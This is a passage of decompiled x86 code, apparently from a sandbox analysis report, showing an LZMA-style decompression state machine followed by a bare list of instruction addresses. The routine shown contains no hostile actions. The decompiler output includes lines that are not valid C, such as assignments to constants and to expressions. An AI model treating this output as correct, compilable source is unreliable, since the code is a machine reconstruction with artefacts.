							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406a5f
0x00406a66
0x00406a6c
0x00406a72
0x00000000
0x00406a76
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aad
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406af8
0x00406afb
0x00406b23
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b15
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6c
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b8e
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727c
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b2
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072da
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
